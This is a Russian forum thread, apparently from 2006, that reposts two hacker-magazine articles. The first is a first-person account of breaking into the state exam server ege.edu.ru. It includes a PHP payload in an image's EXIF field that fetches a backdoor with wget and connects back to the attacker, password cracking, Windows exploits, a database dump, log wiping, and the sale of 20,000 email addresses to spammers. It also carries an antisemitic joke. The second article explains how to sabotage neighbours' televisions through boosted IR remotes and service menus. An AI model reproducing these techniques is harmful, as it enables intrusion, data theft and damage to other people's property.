копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить

Автор: Metallica Nov 19 2006, 17:20

Цитата(Tier @ Nov 19 2006, 17:56) *

копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить

флуд ('>:(',%20'smid_1')

Автор: Metallica Nov 19 2006, 20:40

Взломанный госэкзамен

Штурмуем ege.edu.ru

Вот и наступил июль. Для кого-то это поездка на море и долгожданный отдых, а для выпускников школ России - время поступления в ВУЗы. А чтобы попасть в хороший универ, нужно поднапрячься на вступительных экзаменах или набрать приличные баллы на Едином государственном экзамене (ЕГЭ). Можно, конечно, пойти другим путем и взломать официальное хранилище результатов ЕГЭ. Ведь хакеры никогда не ищут легких путей.

День только начинался, и я по обыкновению смотрел телевизор. В полусонном состоянии нажимал кнопки пульта, переключая каналы, пока не остановился на интересной программе, где говорили о новых проектах Министерства образования, в частности, о ЕГЭ: хорошо это, мол, или плохо, нужно оно или нет. Вообще, такие программы я не люблю, и, наверное, переключил бы и этот канал, если бы разговор не зашел о невероятной информативности и безопасности, и плюс ко всему 100% оцениванию знаний ученика. Весьма неплохо одетый чувак в сером пиджаке сказал, что результаты по всей России стекаются на единый сервер ЕГЭ - ege.edu.ru. И что-то уж очень мне захотелось провести неформальный аудит этого интересного объекта, благо такая инфа очень дорого стоит.

Первые шаги к победе

Мой экран чист, в адресной строке находятся заветные слова - about:blank. Браузер ждет новой ссылки, а в его недрах уже вбита свежая анонимная прокся. И вот я лицезрею главную страницу ege.edu.ru. Дизайн сайта мне понравился, да и рассчитан он был на информативность. В первую очередь, бросилось в глаза то, что портал был написан на JSP, языке, который взломать мне пока не по силам. Быстренько полазив по ссылкам, я понял, что легкой добычи не будет. Явных ссылок, где было написано: «Вставь сюда |id| — и ты выполнишь команды на сервере», конечно же, не было. Полчаса ползанья по сайту ничего не дало. Не было даже ни одной захудалой xss'ки, благодаря которой я теоретически мог бы утянуть чьи-то плюшки. Также не прослеживалось инклуд-бага и подозрений на инъекции. Явно день складывался не в мою пользу. «Нет багов на сайте, попробую просканировать сервер», — подумал я и запустил страшного зверя nmap с параметрами ege.edu.ru -sS -O -p1-. Спустя 10 минут сканер выдал мне следующую информацию.

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on ege.edu.ru (85.142.20.50):

(The 65432 ports scanned but not shown below are in state: closed)

Port State Service

22/tcp filtered ssh

80/tcp open http

3128/tcp filtered squid-http

3141/tcp filtered vmodem

3389/tcp filtered ms-term-serv

Remote operating system guess: FreeBSD 6.0

Зри в картинку!

Как видим, практически все порты на сервере фильтровались. Опять-таки теоретически это не было проблемой, так как залить connback-шелл и получить консоль мне ничего не мешало. Однако бажных сервисов в инфе nmap'а я тоже не видел sad.gif. И я решил просканировать вручную главный портал - www.edu.ru. Изначально проверив соответствие IP-адресов командой host, я окончательно убедился, что www.edu.ru и ege.edu.ru находятся на одном сервере. Таким образом, было решено зайти на главный сайт и зарегистрироваться там, чтобы еще глубже прощупать возможности интерфейса. Случается, что зарегистрированные пользователи получают доступ к большему числу скриптов, нежели гости. И с этой мыслью я перешел по вкладке регистрации. Весьма интересным оказался тот факт, что при регистрации возможен аплоад фотографии на сервер. Этот момент здорово привлек мое внимание.

Изначально я тупо переименовал php-файл в картинку, надеясь на то, что скрипт сохранится в недрах системы, но обломался. Здесь программеры поработали на славу и включили распознавание контента (судя по сообщению о некорректности изображения). Руки невольно опускались, и я начал понимать, что сломать ЕГЭ мне не по зубам.

Но буквально через час я вспомнил, что рисунок - это не просто изображение. В него можно вставлять различные тэги, которые в ряде случаев способны выполняться как команда. В моем случае это сделать достаточно реально. Смотри: движок регистрации написан на PHP, теоретически при показе рисунка скрипт тупо берет все его содержимое и сливает браузеру. Но при наличии вредных тэгов, обрамленных <? ?>, часть рисунка может интерпретироваться как команда!

Все эти мысли промелькнули в моей голове за пару секунд. Зайдя на страницу http://www.edu.ru/index.php?page_id=13, я аккуратно заполнил все поля, представившись Исааком Моисеевичем Абрамсоном. Затем нашел в Гугле фотографию несчастного еврейского мальчика, слил ее на комп и открыл с помощью AcdSee. Далее дело техники: в поле введения EXIF я забил незамысловатую строку <?system("id");?> и бережно сохранил файл. Теперь мне ничего не оставалось, как просто загрузить фотку на сервер, не забывая отметить флажок «Поставьте флажок, если хотите опубликовать свои данные на нашем сервере».

Залив аццкий гифчик на сервер, я поспешил узреть свой профиль. Ура! Как я и думал, изображения подгружаются не напрямую, а через сценарий PHP. Однако вывода команды в исходниках рисунка я не увидел, собственно, как и комментария. Это было странно, поскольку при самом плохом раскладе я все равно должен был узреть мой комментарий. Проверить бажность движка можно было лишь одним способом: попытаться залить и выполнить connback-шелл. Для этого мне пришлось снова регистрироваться, но уже под именем Абрам Исаакович Шпильман. Картинка была та же, но подверглась ужасной трепанации. Запрос вырос в разы и стал выглядеть как <?system("wget aabbcc4.chat.ru/bd -O /tmp/b; chmod +x /tmp/b; /tmp/b 1.1.1.1");?>, где b был свежескомпиленный под FreeBSD бэкдор (мое чутье подсказывало мне, что воспользоваться услугами gcc через WWW было нельзя).

Итак, я опять поспешил в свой профиль, заботливо запустив netcat на своем шелле с ip 1.1.1.1. И, о чудо! В консоли появились заветные строчки о том, что connback соединился с моим сервером.

Первые сдвиги были налицо. Освоившись в системе, я узрел, что на сервере крутилась база MySQL. Она и привлекла мое внимание. Первое, что я сделал, — это перешел в каталог $HOME и попытался прочитать какие-либо конфиги. Но, как оказалось, Apache был настроен с suexec, поэтому прочесть каталог lib мне никак не удавалось. Неприятен был еще один факт: на сервере действительно был запрещен gcc, но данное ограничение я уже обошел. Набрав команду who, я увидел вполне себе живого админа, так что решил убраться восвояси до наступления сумерек.

А был ли Windows?

Ночью, повторив все вышеописанные шаги, я снова был в системе. Фряха, как я уже говорил, являлась достаточно новой, поэтому об эксплоитах я и думать забыл. Была надежда, что найдется какая-то зацепка, и сдвинусь с мертвой точки. Ан нет. Воспользоваться услугами locate я не мог - permission denied. Попробовав команду find / -name *pass* -ls, я не нашел ничего, кроме /etc/passwd и какой-то фигни в /usr/share. Примечательно, что каталог /home вообще не читался, поэтому find обошел его стороной.

Но это совсем не значит, что ситуация безвыходная. Я прочитал /etc/passwd и нашел там 4 пользовательских аккаунта группы wheel с шеллом /bin/bash. Один из них звался antonic. Именно в его папку я сумел зайти командой cd /home/antonic. Следующая команда ls дала мне возможность ознакомиться с содержимым каталога. Почему я это все описываю? Да потому, что нашел там каталог 1 с файлом pass.txt. Внутри него красовалась живописная строка: «Сменить на 11039423-02». Первое, что я хотел сделать, - попробовать этот пароль на консоль (может, моя радость была преждевременной, и Антоник записал какой-то другой пароль).

Но, как ты помнишь, 22 порт нещадно фильтровался, а у connback-шелла не было псевдотерминала. Если я наберу команду su, то система будет ругаться на отсутствие ttyp и не даст мне сменить пользователя. Здесь можно было выбрать два варианта: либо залить портированный эмулятор tty под Фряху, либо воспользоваться expect-сценарием. Я выбрал третий вариант — просто написал ssh antonic@localhost и интерактивно ввел пароль. И не ошибся. Я был внутри, но уже с группой wheel!

«Ну, пробил я головой стенку, и что я буду делать в соседней камере?», — подумал я. Прочитав хистори Антоника в надежде найти там рутовый пароль, я снова обломался: оказывается этот лопоухий юзер ни разу не переключался на рута sad.gif. Все это ввергло меня в большие печали, но тут я решил просканировать всю подсеть 85.142.20.50/29 на наличие иных серверов.

Резвый nmap (мне повезло, что он входит в поставку FreeBSD) показал еще один включенный компьютер в этой подсети с отпечатком WinXP без сервиспаков. Сначала я подумал, что это шутка или недоразумение, ведь таких машин в сети днем с огнем не сыщешь. Как оказалось позже, это действительно была голая винда, до зубов зафаерволенная изнутри. Единственный доверенный хост, как ты понимаешь, был этот Linux-сервер (а быть может, и вся подсеть).

Попробовав опять-таки портированный под фряху rpc-dcom эксплоит (еле нашел у себя на диске этот раритет), я выбрал первый таргет. Бинарник завис в ожидании и не хотел оживать. Как оказалось, виндовый айпишник перестал пинговаться. Вся моя жизнь пролетела перед глазами, и я уже представлял себя за решеткой. Но спустя пару минут айпишник снова ожил (похоже, что система ушла в экстренный ребут). Тогда я попробовал сплоит к баге lsass, потому как последний вариант этого эксплоита более гуманно относился к операционным системам из-за излишней «отточенности» таргетов. Как ни странно, меня ждал успех с первой попытки, так как 445 порт ничем не фильтровался, а заплаток к lsass на винде отродясь не стояло.

Команда «net start» показала наличие встроенного файрвола и remote desktop (видимо, этот дедик использовался для рутинной работы под Windows smile.gif). На единственном диске C:\ находились какие-то документы, html/php-файлы и, по-видимому, архив движка сайта. Вспомнив об архивах, я быстренько набрал команду dir c: /B /S | find /i "tar", и она вывела меня на истинный путь. В дебрях Documents and Settings у админа (в Temp-каталоге) я нашел файл backup.tar.gz. Я тотчас подумал, что это базы ЕГЭ! В момент составив FTP-сценарий для сервера aabbcc4.chat.ru (как это делать, ты уже знаешь), я вывел архивчик. Но, как оказалось, там находилась копия каталогов /home, /etc и /root. Скорее всего, администратор потрошил внутренности своей фряхи и забыл почистить TEMP (кстати, загляни туда и удивись, какой хлам находится в этой папке smile.gif). На самом деле, даже факт наличия /etc/shadow заставлял меня радоваться жизни.

Первое, что я сделал, — это загрузил John брутать рутовый пароль сервера ЕГЭ по 100 Мб русскому/английскому словарю. Собственно, команда запуска была следующей:

john -w big_words -rules shadow > shad.encrypt

Я думал, что мне придется тырить хэши из Windows и ломать их, чтобы подставить в рутовый пароль. Но таких сложностей удалось избежать, так как Джоник справился с паролем на моем P4 за 165 минут (точное время) smile.gif. Опять администратор мог поменять пароль, ведь архив был довольно старым. Но удача мне улыбнулась, и команда su root увенчалась успехом. Я был королем бала!

Добиваем СУБД

Первое, про что я вспомнил, - конфиги mysql smile.gif. Размеренным шагом зайдя в web-каталог, я прочитал конфиг. Там была инфа о том, как подцепиться к локальной базе site. Выполнив mysql -uuser -ppass -e 'show databases', я увидел несколько неброских баз (видимо, для различных проектов), а также интересную базу с названием ege06. В списке также мелькала база site. Следующий запрос был уже более конкретен: mysql -uuser -ppass -e 'show tables ege06'. Правда, сразу после нажатия enter, я был послан нафиг - у меня не было прав для входа в базу ege06.

Мне надоело быть ущемленным в правах, поэтому я поступил проще: решил временно убить mysqld, перезапустить его в режиме --skip-grant-tables, слить дамп всей базы ege06 и запустить демон в обычном режиме. Учитывая, что за окном была кромешная тьма, я подумал, что не смущу этим случайных посетителей сайта, и выполнил ряд команд. Правда, мне пришлось посидеть и погрызть ногти пару минут, пока база дампилась на жесткий диск. После перезапуска СУБД я аккуратно забэкапил и базу site, так как в ней было под 20000 e-mail адресов и паролей (пускай и зашифрованных md5). Резервную копию делал, конечно же, командой mysqldump -uroot ege06 > ege.sql. Затем, аккуратно выложив заархивированную копию бэкапа, я быстро стянул ее со своего шустрого дедика.

Что было дальше, ты, наверное, и сам сможешь угадать. Просмотрев по диагонали результаты ЕГЭ, я решил не искать лишних приключений, а просто удалил архив. Впрочем, никто мне не мешал продать результаты, или еще хуже - изменить их на сервере (кто знает, может, это и была база первоисточника), но я не хотел торопиться. Единственное, что я сделал, так это продал местным спамерам базу из 20000 e-mail адресов. Ведь взлом производился отнюдь не из-за денег, скорее из-за простого интереса. После этого случая под мой прицел также попал официальный сайт Министерства образования РФ ed.gov.ru... Но это уже тема другой статьи.

Взломал - убери за собой!

Особое внимание я уделил чистке логов во Фряхе и Винде. Если первая проблема решалась простыми фильтрациями типа grep -v ip /var/log/messages > .tmp; mv .tmp /var/log/messages, то с Виндой мне пришлось попотеть. Дело в том, что я очень волновался за то, что незатейливо отправил машину в ребут. Но разрулить проблему мне помогла очень полезная утилитка clearel (http://thethin.net/clearel.zip), которая при запуске очищает весь системный журнал. Единственное, над чем мне пришлось попариться, так это над заливкой этой программы на виндовый сервак. Но, как говорится, искусство взлома требует жертв smile.gif.

DVD

На нашем DVD-диске ты найдешь консольную утилиту clearel и свежий релиз mysql, портированный под Windows. Как говорится, привыкай к консоли smile.gif

INFO

Ты мог заметить странный порт 3389 в статистике nmap'а. На самом деле этот порт был нужен для remote-подключений к винде через линуховый сервер. Эта цепочка была сделана с помощью хитрых средств dnat и ipfw.

DANGER

Информация, описанная в этой статье, в первую очередь указывает на недостатки в защите важных ресурсов. За использование этого материала в деструктивных целях автор и редакция ответственности не несут.




Автор: Metallica Nov 19 2006, 23:30

Пультом по телеку

Взлом телевизоров вблизи и на расстоянии

Все мы используем пульты дистанционного управления на ИК-основе, но далеко не каждый знает, какие возможности и опасности они предоставляют. Помимо «несанкционированного» переключения каналов у соседа, хакер может проникнуть в инженерное меню, чудовищно исказив геометрию экрана, отключив развертку или убив телевизор каким-нибудь другим способом.

Пелевин как-то сказал: «Телевизор — это унитаз, только наоборот: в унитаз серим мы с вами, а из телевизора серят на нас, причем во всей физической прямоте этого слова. Но даже не это самое страшное. Фактически телевизор превращается в пульт дистанционного управления телезрителем, являясь не просто одним из методов организации видеоряда, а основой телевещания — главным способом воздействия рекламно-информационного поля на сознание, при котором телезритель становится телепередачей, управляемой дистанционно. И в этом состоянии он проводит значительную часть своей жизни».

Хакеры телевизор вообще не смотрят, да и другим не советуют. А самые радикальные группы анархистского толка даже объявляют телевизорам священную войну, то есть джихад. Помните того пацана, который, оставшись один дома (фильм Home alone), с помощью нехитрого приспособления, сооруженного из пульта дистанционного управления, соединенного с телескопом, мешал «любимой» соседке смотреть телевизор, постоянно переключая каналы? Уверен, что многие пытались повторить его подвиг, но достичь успеха удалось единицам. Хотите узнать почему?

Оставив морально-юридический аспект вопроса догнивать на помойке, возьмем свой собственный телевизор и попробуем извратиться с ним по полной программе. Посмотрим, как далеко мы сможем зайти, и что у нас получится с ним сделать.

Боевая экипировка

Для дистанционного управления телевизором нам потребуется пульт, совместимый с типом атакуемой жертвы на уровне протоколов модуляции и команд управления. Систем модуляции всего три:

1. Система ITT, разработанная компанией GRUNDIG и основанная на измерении интервалов времени между последовательностью коротких импульсов излучения (в настоящее время практически полностью вышла из употребления);

2. Система RC-5, разработанная компанией PHILIPS, использует метод двухфазной передачи данных, модулирующий постоянный несущий сигнал (используется и по сей день, но все реже и реже, да и то в основном в отечественных телевизорах);

3. Система SIEMENS, разработанная одноименной компанией и модулирующая высокочастотный несущий сигнал (частота которого, кстати говоря, может варьироваться в широких пределах) навороченным цифровым протоколом, поддерживающим среди прочих фич еще и синхронизацию приемника с передатчиков. Пользуется большой популярностью у зарубежных телестроителей.

В настоящее время чаще всего используется объединенная система RC-5+SIEMENS, реализованная в микросхемах практически всех популярных производителей: PHILIPS, SIEMENS, THOMSON, SAMSUNG, LG и др. Теоретически можно создать универсальный пульт, поддерживающий одновременно множество моделей телевизоров. И такие пульты уже представлены на рынке (изготовленные, как правило, кустарным способом). Если же такого пульта нет, то необходимо приобрести «родной» пульт модели-жертвы, который сейчас продается практически в любом магазине, торгующем теле-аудио техникой.

По паспорту, номинальный рабочий диапазон пульта редко превышает несколько десятков метров (да и то лишь на свежих батареях). Учитывая невысокую плотность расположения домов, для диверсионных целей такого поражающего радиуса оказывается недостаточно, и без серьезной «хирургической» доработки здесь не обойтись! Можно, конечно, приложить пульт к окуляру телескопа типа «Мицар» или «Альтаир», выпускаемых Новосибирским приборостроительным заводом, и, прицелившись через искатель, вести огонь прямой наводкой, расстреливая телевизоры в домах напротив. Однако тут надо учесть, что коэффициент преломления инфракрасных лучей заметно отличается от видимого света, поэтому визуальная фокусировка невозможна! Необходимо выполнить перерасчет или подобрать положение фокусировочного кольца экспериментально. Но все равно телескоп — это дорого, громоздко и неудобно. Гораздо проще (и дешевле) доработать сам пульт, а для этого его необходимо вскрыть, орудуя кухонным ножом, как показано на рисунке 1.

После извлечения печатной платы из корпуса мы увидим излучающий инфракрасный светодиод, один из выводов которого, как правило, подключается к общему проводу (то есть, к массе), а другой — к коллектору биполярного высокочастотного транзистора. Предельную яркость ограничивает резистор, подключенный к базе (см. рис. 2).

Уменьшив сопротивление «базового» резистора (например, подпаяв параллельно ему еще один), мы увеличим яркость свечения светодиода, и «дальнобойность» пульта резко возрастет. Любители экстремальных ощущений могут перерезать питающую дорожку, ведущую к эммитору, и подать на транзистор до 5 Вольт. Светодиод заморгает как сумасшедший, и несмотря на то, что он скоро сгорит, за это время с таким пультом можно успеть многим навредить, хотя это будет уже не хакерство, а самое настоящее варварство.

Серьезные охотники удаляют светодиод, заменяя его лазерным излучателем. Лазерные указки — самое доступное оружие, но, увы, далеко не самое лучшее, поскольку их рабочий диапазон лежит в видимом свете, а фотоприемник телевизора защищен инфракрасным светофильтром, значительно ослабляющим видимый свет. Поэтому потребуется достаточно мощная указка, для «раскачки» которой одного транзистора может уже не хватить, и придется подпаивать дополнительный каскад, а для этого необходимо не только владеть навыками пайки, но и иметь некоторые познания в электронике.

Сторожевые системы (которые легко найти в магазинах, торгующих радиоконструкторами или заказать по почте) зачастую используют инфракрасные лазеры, идеально подходящие для охотничьих целей. В зависимости от фантазии и умения работать руками (по металлу) конструкции орудия могут быть различными. Кто-то засовывает лазерный излучатель прямо в ствол пневматической винтовки, кто-то вытачивает специальную насадку на бинокль или подзорную трубу, юстируя ее так, чтобы центр «креста нитей» окуляра совпадал с инфракрасным лучом. Работает такое устройство практически на любых расстояниях, ограниченных одним лишь горизонтом видимости, однако если требуется пострелять в жильцов, живущих снизу или сверху, то ничего не получится. Разве что забраться на крышу соседнего дома или подобрать только что выпаянный светодиод, прикрепив его к телескопической штанге, которую охотник сможет двигать во всех направлениях.

Достоинство светодиода (по сравнению с лазером) в том, что он дает расходящийся пучок света, многократно отражаемый от предметов окружающей обстановки (никто из вас не пробовал управлять телевизором, направив пульт в потолок или противоположную стену?), поэтому «подстрелить» жертву становится очень легко — даже необязательно прицеливаться. Главный (и, пожалуй, единственный) минус такого решения в том, что интенсивность изучения убывает пропорционально квадрату расстояния, в то время как лазер дает практически параллельный пучок. Короче, залогом успешной охоты становится богатый инвентарь. В одних случаях применяется одно оружие, в других — другое.

Мелкие пакости

Итак, вражеский телевизор лежит в перекрестье прицела, влажные от волнения пальцы застыли на пульте. Самое простое, что можно сделать (не привлекая к своей персоне никакого внимания), — это нащупать большую красную кнопку и вдавить ее до упора, отправляя телевизор в ждущий режим типа standby. После нескольких таких самопроизвольных отключений, агрегат, как правило, отправляется хозяевами на лечение в ближайшую мастерскую (очень помогает против соседей, увлекающихся повышенной громкостью по ночам, когда все нормальные хакеры занимаются отладкой программ, требующей глубокой сосредоточенности, граничащей с медитацией, и все посторонние звуки высаживают на глухую измену, то есть раздражают). Еще можно поиграть переключателем каналов, кнопкой «mute», регуляторами яркости, насыщенности и контраста, но, поскольку все эти действия отображаются на экране, жертва быстро сообразит, где тут собака зарыта, и займется поисками охотника, наблюдая за окнами соседних домов. Чтобы не быть пойманным и растерзанным без суда и следствия, необходимо заблаговременно позаботиться о маскировке.

Некоторые хакеры практикуют совершенно изумительный трюк: включая телевизор в отсутствие хозяев, они запускают режим «ручного» поиска станций и заводят все каналы на «пустоту». Внешне это выглядит так, как будто-то телевизор «теряет» каналы, что могло быть вызвано, например, выходом из строя микросхемы энергонезависимой памяти, программатора или фильтров в цепях питания. Дефекты подобного рода встречаются достаточно редко, но относятся к разряду «трудных», и телемастер может ковыряться в телевизоре целый месяц, прежде чем придет к выводу, что источник сбоев приходит откуда-то извне. Но по сравнению с тем, что ждет нас вперед, это всего лишь невинные шалости. В конце концов, каналы можно настраивать каждый раз перед просмотром.

С телевизорами, имеющими парольную защиту от детей, все обстоит намного хуже. По умолчанию она не задействована, и хакер свободно может установить любой пароль, предварительно заблокировав доступ ко всем органам управления. Подобрать пароль за разумное время практически невозможно, и для снятия блокировки приходится перепрограммировать микросхему энергонезависимой памяти, а для этого необходимо иметь фирменную прошивку, которая есть только в крупных сервисных центрах, да и то не во всех. Но даже если ее раздобыть (контрабандой или считыванием с телевизора идентичной модели), все индивидуальные настройки, касающиеся фокусировки, геометрии, цветового баланса и даже разгонных напряжений кинескопа, окажутся безвозвратно утерянными, и качество изображения резко упадет. Теоретически все параметры можно отстроить заново, но далеко не каждый мастер захочет с этим возиться, да и невозможна такая настройка в условиях маленькой мастерской. Без специальных (и весьма дорогостоящих) генераторов сигналов здесь не обойтись, а значит, после ремонта о прежнем качестве можно и не мечтать. (Небольшая ремарка: среди телемастеров также встречаются хакеры, которые знают, где именно хранится пароль и как он обнуляется, но таких еще найти надо).

Кстати говоря, огромным достоинством большинства телевизоров SAMSUNG является автоматическая загрузка базовой прошивки из ПЗУ: достаточно установить чистую микросхему памяти (как правило, марки IC902), включить телевизор в сеть и оставить его в ждущем режиме на 10-15 секунд. Но при этом вместе с прошивкой переписываются и настройки по умолчанию, то есть для достижения качественного изображения их все равно придется перенастраивать заново.

Внутри инженерного меню

Практически все современные телевизоры (DVD-плееры и прочие устройства) имеют специальные инженерное меню (service menu), дающие доступ к настройке служебных параметров (фокусу, геометрии экрана, цветовому балансу, etc) и скрытым возможностям типа HOTEL MODE (режим «отеля»). Это очень полезный режим для телевизоров, установленных в гостиницах или мотелях, который блокирует все функции пульта управления, кроме переключения каналов, а при необходимости еще и ограничивающий максимальную громкость звука, чтобы она никому не мешала. Только представьте, как обрадуется владелец телевизора с заблокированным пультом и громкостью, сбавленной до нуля. А ведь разблокировать все назад можно только в мастерской!

Вызов инженерного меню, как правило, осуществляется недокументированной комбинацией клавиш штатного пульта дистанционного управления. Реже — кнопок лицевой панели, расположенных непосредственно на самом телевизоре (см. рис. 3). В частности, линейка SONY KV 29FX требует удерживать клавиши PROG и PROG при включении питания. Пульт дистанционного управления при этом начисто игнорируется, что делает эти модели неподвластными взлому. К радости хакеров, таких телевизоров относительно немного. Производители все еще не осознали угрозу, исходящую от инженерного меню, а потому не предпринимают никаких шагов для его защиты.

В исключительных случаях требуется специальный пульт управления, который можно приобрести на радиорынке (см. рис. 4), или собрать на основе уже готовых пультов по схемам, найденным в сети (например, monitor.espec.ws/section1/topic60458.html). Ведь по сути дела все сводится к изучению определенной последовательности инфракрасных импульсов, которую очень легко запрограммировать на любом процессоре (хоть на том же ПК с ИК-адаптером).

Некоторые модели телевизоров фирмы SHARP позволяют добраться до инженерного меню только через непосредственное вмешательство в цепь управления процессором (в частности, модель 14/21 JN1 требует подачи 5 Вольт на 37-ю лапу микроконтроллера). Однако это уже экзотика, достойная лишь упоминания, но не более того. Основное внимание мы сосредоточим на телевизорах, вызывающих инженерное меню определенной комбинацией клавиш со штатного пульта управления.

Комбинация эта у каждого семейства телевизоров своя. Она отсутствует в руководстве пользователя, но с той или иной степенью подробности описывается в технической документации, распространяемой в узком кругу сервисных центров или аттестованных телемастеров. Никакого секрета она не представляет и чаще всего отдается без всякого NDA (Non - Disclosure Agreement – отдаленный аналог советской «подписке о неразглашении», не путать с National Drug Agency, сформированным в Риме 1 января 1999-го). Поэтому на многих радиолюбительских сайтах можно найти целую коллекцию подобных комбинаций, крупнейшим из которых является www.telemaster.ru (см. рис.5).

Много полезной информации публикует и журнал «Ремонт электронной техники» (http://www.elcp.ru/), но, к сожалению, в отрытый доступ выложены только журналы, опубликованные до середины 2003-го года (см. рис. 6), а за остальные приходится платить. Впрочем, телевизоры в плане обновления (upgrade) намного более консервативны, чем компьютеры 5-10-летней давности. К счастью, инженерное меню подробно описано в четвертом и пятом номерах РЭТ'а за 2001 год.

Можно обратиться за помощью на какой-нибудь ремонтный форум, например http://monitor.espec.ws/section1/ (см. рис. 7). С определенной степенью вероятности там помогут.

Наконец, можно приобрести весьма недурственную книжку Home Theater Hacks от O'Reilly (см. рис. 8) — там посвящен целый раздел взлому инженерных меню, но перечня конкретных комбинаций клавиш для каждой модели телевизора, увы, нет.

В частности, для большинства телевизоров фирмы SONY вызов инженерного меню осуществляется так: в режиме Standby (когда горит красный светодиод на лицевой панели), нажимается следующая последовательность клавиш на пульте управления (см. рис. 9).

Если все ОК, то телевизор немедленно переключается в так называемый TT-режим (tempo time), легко опознаваемый по надписи «TT--» в верхнем правом углу экрана и статусной информацией ниже него.

Переход в сервисное меню из TT-mode осуществляется двукратным нажатием клавиши <menu> на пульте управления до появления следующей картинки (см. рис. 11). Что делать дальше — сообразить нетрудно. Перемещаясь по пунктам меню «джойстиком» (кнопка <joystick>), подводим курсор к нужному пункту и нажимаем <OK>. Выход из инженерного меню обычно происходит по нажатию Standby на пульте управления (с сохранением всех измененных параметров) или путем выдергивая телевизора из розетки (измененные параметры при этом не сохраняются). Кстати говоря, последнюю операцию можно реализовать и удаленно, вооружившись пневматической винтовкой, перебив силовой шнур (шутка!) или обесточив квартиру рубильником на щитке.

Любопытный нюанс: большинство телевизоров имеет специальный счетчик входов в инженерное меню, и если в сервисном центре увидят, что здесь кто-то уже побывал, то в гарантийном ремонте могут запросто отказать, выставив клиента пинками за дверь. Впрочем, это не совсем законно, и поэтому может быть обжаловано в суде, только вряд ли что из этого получится.

Основная сложность заключается в том, что экран телевизора-жертвы зачастую недоступен охотнику, и все действия приходится выполнять вслепую, а для этого необходимо заранее потренироваться на телевизоре схожей или идентичной модели. Названия большинства пунктов говорят сами за себя, и при желании качество изображения можно не только ухудшить, но и улучшить! Особенно это касается бракованных партий, распространяемых «серыми» дилерами, или телевизоров, собранных «по лицензии» в соседнем подвале. Так устраняются геометрические искажения (см. рис. 12), уходит краснота лиц и многие другие дефекты, объясняющиеся небрежной настройкой, которая в условиях подпольной сборки становится слишком обременительной.

Находясь в сервисном меню, следует соблюдать величайшую осторожность и ни в коем случае не менять тех пунктов, назначение которых доподлинно неизвестно. Одно неверное движение может запросто «убить» телевизор! Достаточно отключить развертку, чтобы инженерное меню уже никогда не появилось на экране. Теоретически вернуть настройки можно и вслепую, но в условиях сервис-центра гораздо проще заменить микросхему энергонезависимой памяти.

Однако это еще не самое страшное! Некоторые настройки (особенно связанные с управляющими токами и напряжениями) могут вывести из строя несколько узлов!

А что же на счет мониторов? Процессорные блоки у них появились уже давно, а сейчас все чаще и чаще начинают попадаться и пульты управления (очень удобно, когда монитор используется и как рабочий инструмент, и как средство для просмотра DVD). Небольшое расследование показало, что в наиболее распространенных моделях никакого инженерного меню нет, во всяком случае, его нельзя вызывать ни с пульта, ни с лицевой панели. Однако прогресс не стоит на месте, электронная начинка мониторов стремительно усложняется, и прошивка начинает играть далеко не последнюю роль, а там, где есть прошивка, тем есть и возможность ее обновления или настройки. Тем более что сплошь и рядом приходится сталкиваться с ситуацией, когда одна и та же модель LCD-мониторов, выпускаемая одной и той же фирмой, в различных партиях использует матрицы от разных производителей, компенсируя разброс параметром настройкой firmware. Это может осуществляться не только аппаратным путем, но и по цифровому или аналоговому интерфейсу с компьютером. Протоколы обмена пока что не разглашаются, но авторизированные сервисные центры уже имеют специальные приборы для «тонкой» настройки. Остается только перехватить сигнал и расшифровать, после чего любой хакер запросто сможет написать вирус, если не выводящий монитор из строя, то приводящий изображение в непотребный вид.

DVD-плееры мы уже упоминали, но не стали на них акцентироваться, поскольку это тема совсем для другого разговора. Для охоты они не представляют существенного интереса, поскольку достаточно мало распространены (по сравнению с телевизорами), да и цели у хакера, скорее всего, будут другими (например, превратить привод в мультизональный, залить хакерскую прошивку, поддерживающую новые форматы файлов и т. д.). Выводить плееры из строя в силу их невысокой цены и отсутствия трудно-восстановимых уникальных настроек, резону нет. DVD – это не унитаз. Это — хорошая штука. И ломать их не нужно.

Как защититься от вандалов

Приобретая новый телевизор, заблаговременно поищите название его модели в интернете с ключевыми словами service menu и посмотрите, доступен ли вызов инженерного меню с пульта дистанционного управления? За редкими исключениями инженерное меню никогда не закрывается паролем, и поэтому защититься от злоумышленников программным путем никак не удастся. Лучше выбрать другой телевизор, благо на скудность ассортимента жаловаться уже не приходится.

С уже купленной аппаратурой дела обстоят намного сложнее. Но ведь не ставить же телевизор так, чтобы он не был доступен для обстрела из окон?! Далеко не каждый располагает жилплощадью, позволяющей делать такой выбор, да и к тому же обстрел может осуществляться не только прямой наводной, но и путем рикошета от стен или зеркал (убрать зеркала, на стены повесть ковры на потолок мрачные матовые обои в готическом стиле).

Самое простое и самое надежное решение — натянуть на «глазок» фотоприемника картонную трубочку длиной ~5 см, зачерненную изнутри. Конечно, легальным владельцем целиться пультом управления в телевизор будет уже сложнее, но зато это обеспечит надежную защиту от хакеров, вандалов и прочих любопытствующих.

Заключение

Современная аппаратура становится все сложнее, интеллектуальнее, многофункциональнее, умнее, но вместе с тем все уязвимее! Цифровые телевизоры позволяют обновлять свою прошивку прямо через телеэфир, а это значит, что любой хакер, вооруженный передатчиком, может внедрить в firmware своего вируса или прочую гадость.

Грядет эра тотального взлома, когда ломаться будет все, начиная от контроллера внутри смывного бочка унитаза и заканчивая спутниками. Как говорится, история нас учит тому, что ничему не учит. (с) Валентин Пашенцев. Разработчики думают, о чем угодно, но только не о безопасности. И хорошо, что большинство дыр эксплуатируется хакерами-одиночками, а не профессиональным спецназом противоборствующих стран. Наказывать за невинные шалости не только глупо, но и преступно! Если подростки будут регулярно угонять с военных баз самолеты, несущие ядерные боеголовки, то судить в первую очередь следует тех, кто проектировал систему безопасности, а подростков представить к награде (хотя бы посмертно). Так как в боевой обстановке наличие подобной дырки может очень сильно аукнуться, и чем раньше удастся ее выявить, тем лучше для всех.

CD/DVD

На DVD-диске мы выложили сборники комбинаций клавиш для входа в цифровое меню телевизоров. В документации охвачены практически все модели старых и новых телеков.

DANGER

Вся информация в этой статье дана лишь в ознакомительных целях. За любое незаконное использование материала автор и редакция не несет никакой ответственности.




